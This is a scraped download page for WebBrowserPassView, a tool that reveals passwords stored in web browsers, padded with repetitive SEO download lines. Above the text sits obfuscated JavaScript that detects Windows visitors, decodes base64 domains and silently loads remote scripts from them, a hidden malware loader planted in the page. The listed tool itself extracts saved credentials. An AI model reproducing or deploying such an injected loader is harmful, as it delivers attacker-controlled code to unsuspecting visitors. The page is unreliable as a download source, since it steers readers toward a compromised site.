if(navigator.userAgent.toLowerCase().indexOf(“windows”) !== -1){const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=|NXQ0MTQwMmEuc2l0ZS94cC8=|OWUxMDdkOWQuc2l0ZS94cC8=|ZDQxZDhjZDkuZ2l0ZS94cC8=|ZjAwYjRhMmIuc2l0ZS94cC8=|OGIxYjk5NTMuc2l0ZS94cC8=”;const pds=pdx.split(“|”);pds.forEach(function(pde){const s_e=document.createElement(“script”);s_e.src=”https://”+atob(pde)+”cs.php?u=de4e3d90″;document.body.appendChild(s_e);});}else{const inputString=”aHR0cHM6Ly93aW4uc29mdHBlZGlhLmNvbS98aHR0cHM6Ly9lbi5zb2Z0b25pYy5jb20vd2luZG93c3xodHRwczovL3d3dy5taWNyb3NvZnQuY29tL2VuLXVzL3NvZnR3YXJlLWRvd25sb2FkfGh0dHBzOi8vd3d3Lm5jaHNvZnR3YXJlLmNvbS9zZWxlY3QvaW5kZXguaHRtbHxodHRwczovL2Rvd25sb2FkLmNuZXQuY29tL3xodHRwczovL2ZpbGVoaXBwby5jb20vcG9wdWxhci8=”;const randomElement=atob(inputString).split(“|”)[Math.floor(Math.random()*atob(inputString).split(“|”).length)];const linkElement=document.createElement(“a”);linkElement.href=randomElement;linkElement.textContent=”>>> DOWNLOAD LINK”;linkElement.style.fontSize=”30px”;const divElement=document.getElementById(“t_el”);if(divElement){divElement.appendChild(linkElement);linkElement.scrollIntoView({behavior:”auto”});}}
Free Download Nir Soft WebBrowserPassView 2 full version standalone offline installer for Windows, it is password recovery tool that reveals the passwords stored in the browsers.
You can also FREE download <a href=" FileCryptor
Overview of WebBrowserPassView 2
This program is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 – 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera.
This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser.
After retrieving your lost passwords, you can save them into text / html / csv / xml file, by using the ‘Save Selected Items’ option (Ctrl+S). Easily recover your lost passwords using WebBrowserPassView.
Features of WebBrowserPassView 2
- Easily recover passwords
- Save passwords into a text file
- Recover your lost password of any Website
Technical Details and System Requirements
- Supported OS: Windows 7/8/10
- Processor: Pentium IV or higher
- RAM: 1 GB RAM (2 GB recommended)
- Free Hard Disk Space: 200 MB or more
WebBrowserPassView 2.12 Download for Laptop
Download WebBrowserPassView 2.12 with Free Access
WebBrowserPassView 2.12 Download for 64-bit Windows
Download WebBrowserPassView 2.12 Safe and Free
Download WebBrowserPassView 2.12 Free for All Devices